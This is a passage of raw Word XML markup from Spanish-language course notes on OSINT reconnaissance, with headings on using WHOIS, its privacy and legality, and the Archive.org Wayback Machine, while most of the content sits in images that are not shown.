      <w:r w:rsidRPr="006B41C5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resultado (tu IP):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1DB135" w14:textId="4938532F" w:rsidR="006B41C5" w:rsidRDefault="0056486D" w:rsidP="003860AC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0056486D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="419DB0F1" wp14:editId="77233093">
            <wp:extent cx="3779520" cy="1736479"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12995101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101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85276" cy="17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6486D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Realidad</w:t>
      </w:r>
      <w:r w:rsidR="000944DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="000944DA" w:rsidRPr="000944DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10DC0C37" wp14:editId="2DEF5478">
            <wp:extent cx="3808984" cy="2979420"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="3228494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9426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2726" cy="29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9306" w14:textId="4CA45955" w:rsidR="000944DA" w:rsidRDefault="000944DA" w:rsidP="000944DA">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003860AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2.1.7.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="003860AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000944DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>CÓMO USAR WHOIS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C042A6" w14:textId="4F488231" w:rsidR="000944DA" w:rsidRDefault="000944DA" w:rsidP="003860AC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000944DA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BB76054" wp14:editId="53F10C22">
            <wp:extent cx="5036820" cy="1995140"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1607677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77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2371" cy="19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A047" w14:textId="77777777" w:rsidR="004155A9" w:rsidRDefault="004155A9" w:rsidP="003860AC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="748B069F" w14:textId="77777777" w:rsidR="004155A9" w:rsidRDefault="004155A9" w:rsidP="003860AC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DE00A94" w14:textId="46BD079B" w:rsidR="004155A9" w:rsidRDefault="004155A9" w:rsidP="004155A9">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003860AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.7.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="003860AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004155A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>USO EN HACKING ÉTICO (OSINT):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171A4EF4" w14:textId="77777777" w:rsidR="004155A9" w:rsidRPr="004155A9" w:rsidRDefault="004155A9" w:rsidP="004155A9">
      <w:r w:rsidRPr="004155A9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WHOIS es oro para reconocimiento:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A72DF9" w14:textId="05C33DA0" w:rsidR="004155A9" w:rsidRDefault="004155A9" w:rsidP="004155A9">
      <w:r w:rsidRPr="004155A9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E1FCD03" wp14:editId="13C5238A">
            <wp:extent cx="5135880" cy="1411416"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="18567458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458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4478" cy="14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A820" w14:textId="4E20251B" w:rsidR="004155A9" w:rsidRDefault="004155A9" w:rsidP="004155A9">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003860AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2.1.7.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="003860AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C173FC" w:rsidRPr="00C173FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>EJEMPLO REAL DE RECONOCIMIENTO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273F3F97" w14:textId="74883B5E" w:rsidR="00C173FC" w:rsidRDefault="00C173FC" w:rsidP="00C173FC">
      <w:r w:rsidRPr="00C173FC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="295A84E7" wp14:editId="37E1859D">
            <wp:extent cx="3909060" cy="2917679"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13931182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82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2766" cy="29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A477" w14:textId="092B6D63" w:rsidR="00C173FC" w:rsidRDefault="00C173FC" w:rsidP="00C173FC">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003860AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2.1.7.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="003860AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C173FC">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="00C173FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> PRIVACIDAD EN WHOIS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8E644E" w14:textId="77777777" w:rsidR="00C173FC" w:rsidRPr="00C173FC" w:rsidRDefault="00C173FC" w:rsidP="00C173FC">
      <w:r w:rsidRPr="00C173FC">
        <w:t xml:space="preserve">Muchos </w:t>
      </w:r>
      <w:r w:rsidRPr="00C173FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ocultan</w:t>
      </w:r>
      <w:r w:rsidRPr="00C173FC">
        <w:t xml:space="preserve"> información personal usando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5918502C" w14:textId="3C4544F6" w:rsidR="00C173FC" w:rsidRDefault="00A85485" w:rsidP="00C173FC">
      <w:r w:rsidRPr="00A85485">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48735F4B" wp14:editId="6E704A3B">
            <wp:extent cx="4115983" cy="2651760"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7894375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375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8856" cy="26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2322" w14:textId="77777777" w:rsidR="00A85485" w:rsidRDefault="00A85485" w:rsidP="00C173FC"/>
    <w:p w14:paraId="1B61A54B" w14:textId="77777777" w:rsidR="00A85485" w:rsidRDefault="00A85485" w:rsidP="00C173FC"/>
    <w:p w14:paraId="031E0A5E" w14:textId="166640C7" w:rsidR="00A85485" w:rsidRDefault="00A85485" w:rsidP="00A85485">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003860AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.7.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="003860AC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A85485">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>⚖️</w:t>
      </w:r>
      <w:r w:rsidRPr="00A85485">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> LEGALIDAD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340A1D97" w14:textId="21E25F50" w:rsidR="00A85485" w:rsidRPr="00C173FC" w:rsidRDefault="00E94DE4" w:rsidP="00C173FC">
      <w:r w:rsidRPr="00E94DE4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="046F36D7" wp14:editId="5A77C25C">
            <wp:extent cx="4284103" cy="2217420"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="5856014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014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7874" cy="22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602E" w14:textId="0631935F" w:rsidR="00C173FC" w:rsidRPr="00C173FC" w:rsidRDefault="00E94DE4" w:rsidP="00C173FC">
      <w:r w:rsidRPr="00E94DE4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36EF593C" wp14:editId="65E15427">
            <wp:extent cx="4632960" cy="2728728"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="79076548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6548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39078" cy="27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709B" w14:textId="77777777" w:rsidR="004155A9" w:rsidRDefault="004155A9" w:rsidP="004155A9"/>
    <w:p w14:paraId="1E34E2E2" w14:textId="77777777" w:rsidR="00EB0AF6" w:rsidRDefault="00EB0AF6" w:rsidP="004155A9"/>
    <w:p w14:paraId="496E0AD6" w14:textId="77777777" w:rsidR="00EB0AF6" w:rsidRDefault="00EB0AF6" w:rsidP="004155A9"/>
    <w:p w14:paraId="00DC1645" w14:textId="77777777" w:rsidR="00EB0AF6" w:rsidRDefault="00EB0AF6" w:rsidP="004155A9"/>
    <w:p w14:paraId="707214E4" w14:textId="77777777" w:rsidR="00EB0AF6" w:rsidRDefault="00EB0AF6" w:rsidP="004155A9"/>
    <w:p w14:paraId="692EF008" w14:textId="77777777" w:rsidR="00EB0AF6" w:rsidRDefault="00EB0AF6" w:rsidP="004155A9"/>
    <w:p w14:paraId="532D1083" w14:textId="77777777" w:rsidR="00EB0AF6" w:rsidRDefault="00EB0AF6" w:rsidP="004155A9"/>
    <w:p w14:paraId="4EA20700" w14:textId="77777777" w:rsidR="00EB0AF6" w:rsidRDefault="00EB0AF6" w:rsidP="004155A9"/>
    <w:p w14:paraId="6AE0E6C1" w14:textId="77777777" w:rsidR="00EB0AF6" w:rsidRDefault="00EB0AF6" w:rsidP="004155A9"/>
    <w:p w14:paraId="3EEC9C20" w14:textId="77777777" w:rsidR="00EB0AF6" w:rsidRDefault="00EB0AF6" w:rsidP="004155A9"/>
    <w:p w14:paraId="0782903A" w14:textId="77777777" w:rsidR="00EB0AF6" w:rsidRDefault="00EB0AF6" w:rsidP="004155A9"/>
    <w:p w14:paraId="5B862E84" w14:textId="77777777" w:rsidR="00EB0AF6" w:rsidRDefault="00EB0AF6" w:rsidP="004155A9"/>
    <w:p w14:paraId="5C53AE37" w14:textId="77777777" w:rsidR="00EB0AF6" w:rsidRDefault="00EB0AF6" w:rsidP="004155A9"/>
    <w:p w14:paraId="2E46B1D2" w14:textId="641DD109" w:rsidR="00EB0AF6" w:rsidRDefault="00EB0AF6" w:rsidP="00EB0AF6">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="007E5315">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1.8 Archive.org</w:t>
      </w:r>
      <w:r w:rsidR="007E5315" w:rsidRPr="007E5315">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> (WAYBACK MACHINE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1CF89E" w14:textId="1EFB1832" w:rsidR="00EB0AF6" w:rsidRPr="00FE5DD2" w:rsidRDefault="00EB0AF6" w:rsidP="00EB0AF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Es un frontend a una base de datos muy extensa que contiene un montón de snapshops como si fueran imágenes de muchas paginas web que se han hecho a lo largo del tiempo.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">Este proyecto lo que hace es recorrer internet </w:t>
      </w:r>
      <w:r w:rsidR="00316073">
        <w:t xml:space="preserve">y va cogiendo el estado actual de diferentes paginas web y crea una imagen del estado en el que se encuentran y la sitúa en un cronograma. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF92E83" w14:textId="77777777" w:rsidR="007E5315" w:rsidRPr="007E5315" w:rsidRDefault="007E5315" w:rsidP="007E5315">
      <w:r w:rsidRPr="007E5315">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Archive.org</w:t>
      </w:r>
      <w:r w:rsidRPr="007E5315">
        <w:t xml:space="preserve"> = "Máquina del tiempo" de Internet que guarda </w:t>
      </w:r>
      <w:r w:rsidRPr="007E5315">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>snapshots (capturas)</w:t>
      </w:r>
      <w:r w:rsidRPr="007E5315">
        <w:t xml:space="preserve"> de páginas web a lo largo del tiempo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72CF814A" w14:textId="77777777" w:rsidR="007E5315" w:rsidRPr="007E5315" w:rsidRDefault="007E5315" w:rsidP="007E5315">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E5315">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🎯</w:t>
      </w:r>
      <w:r w:rsidRPr="007E5315">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ¿QUÉ HACE?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D7F210" w14:textId="77777777" w:rsidR="007E5315" w:rsidRPr="007E5315" w:rsidRDefault="007E5315" w:rsidP="007E5315">
      <w:r w:rsidRPr="007E5315">
        <w:t xml:space="preserve">Archiva </w:t>
      </w:r>
      <w:r w:rsidRPr="007E5315">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>versiones históricas</w:t>
      </w:r>
      <w:r w:rsidRPr="007E5315">
        <w:t xml:space="preserve"> de sitios web desde 1996.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A148B6E" w14:textId="77777777" w:rsidR="007E5315" w:rsidRPr="007E5315" w:rsidRDefault="007E5315" w:rsidP="007E5315">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E5315">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>💡</w:t>
      </w:r>
      <w:r w:rsidRPr="007E5315">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> EJEMPLO PRÁCTICO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F06ADCF" w14:textId="43EED0CC" w:rsidR="00EB0AF6" w:rsidRDefault="007E5315" w:rsidP="004155A9">
      <w:r w:rsidRPr="007E5315">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BCCF4AE" wp14:editId="2E102A83">
            <wp:extent cx="4783667" cy="1362459"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="53502456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2456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89950" cy="13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5531" w14:textId="77777777" w:rsidR="007E5315" w:rsidRPr="007E5315" w:rsidRDefault="007E5315" w:rsidP="007E5315">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E5315">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🕵️</w:t>
      </w:r>
      <w:r w:rsidRPr="007E5315">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> USO EN HACKING ÉTICO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34164237" w14:textId="35331625" w:rsidR="007E5315" w:rsidRDefault="007E5315" w:rsidP="004155A9">
      <w:r w:rsidRPr="007E5315">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03E555F2" wp14:editId="614F5264">
            <wp:extent cx="5464387" cy="1176867"/>
            <wp:effectExtent l="0" t="0" r="3175" b="4445"/>
            <wp:docPr id="5868582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82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72495" cy="11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929" w14:textId="1787DCEA" w:rsidR="00D013FF" w:rsidRDefault="00D013FF" w:rsidP="004155A9">
      <w:r w:rsidRPr="00D013FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>En resumen:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D013FF">
        <w:t xml:space="preserve"> Es una biblioteca digital que </w:t>
      </w:r>
      <w:r w:rsidRPr="00D013FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>guarda el historial de Internet</w:t>
      </w:r>
      <w:r w:rsidRPr="00D013FF">
        <w:t>, permitiendo ver cómo era cualquier sitio web en el pasado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B1484B" w14:textId="267E828B" w:rsidR="00D013FF" w:rsidRPr="00D013FF" w:rsidRDefault="00D013FF" w:rsidP="00D013FF">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D013FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2.1.8.1 ¿Quién lo administra?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103155DB" w14:textId="77777777" w:rsidR="00D013FF" w:rsidRPr="00D013FF" w:rsidRDefault="00D013FF" w:rsidP="00D013FF">
      <w:r w:rsidRPr="00D013FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Organización:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D013FF">
        <w:t xml:space="preserve"> Biblioteca digital </w:t>
      </w:r>
      <w:r w:rsidRPr="00D013FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sin fines de lucro</w:t>
      </w:r>
      <w:r w:rsidRPr="00D013FF">
        <w:t xml:space="preserve"> (501(c)(3) nonprofit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB76B81" w14:textId="77777777" w:rsidR="00D013FF" w:rsidRPr="00D013FF" w:rsidRDefault="00D013FF" w:rsidP="00D013FF">
      <w:r w:rsidRPr="00D013FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fundador:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D013FF">
        <w:t xml:space="preserve"> Brewster Kahle (1996)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA40F80" w14:textId="77777777" w:rsidR="00D013FF" w:rsidRPr="00D013FF" w:rsidRDefault="00D013FF" w:rsidP="00D013FF">
      <w:r w:rsidRPr="00D013FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sede:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D013FF">
        <w:t xml:space="preserve"> San Francisco, California, USA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F380F6" w14:textId="77777777" w:rsidR="00D013FF" w:rsidRDefault="00D013FF" w:rsidP="00D013FF">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00D013FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tipo:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D013FF">
        <w:t xml:space="preserve"> ONG dedicada a preservar conocimiento digital</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713BE7BB" w14:textId="77777777" w:rsidR="006F48CF" w:rsidRDefault="006F48CF" w:rsidP="006F48CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0703E4FC" w14:textId="77777777" w:rsidR="006F48CF" w:rsidRDefault="006F48CF" w:rsidP="006F48CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78188F38" w14:textId="77777777" w:rsidR="006F48CF" w:rsidRDefault="006F48CF" w:rsidP="006F48CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A97DEAE" w14:textId="77777777" w:rsidR="006F48CF" w:rsidRDefault="006F48CF" w:rsidP="006F48CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02C33D0B" w14:textId="77777777" w:rsidR="006F48CF" w:rsidRDefault="006F48CF" w:rsidP="006F48CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="729ECE5A" w14:textId="6F469B5D" w:rsidR="006F48CF" w:rsidRPr="006F48CF" w:rsidRDefault="006F48CF" w:rsidP="006F48CF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F48CF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>💰</w:t>
      </w:r>
      <w:r w:rsidRPr="006F48CF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> FINANCIAMIENTO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07792F09" w14:textId="6727C550" w:rsidR="006F48CF" w:rsidRDefault="006F48CF" w:rsidP="00D013FF">
      <w:r w:rsidRPr="006F48CF">
        <w:rPr>
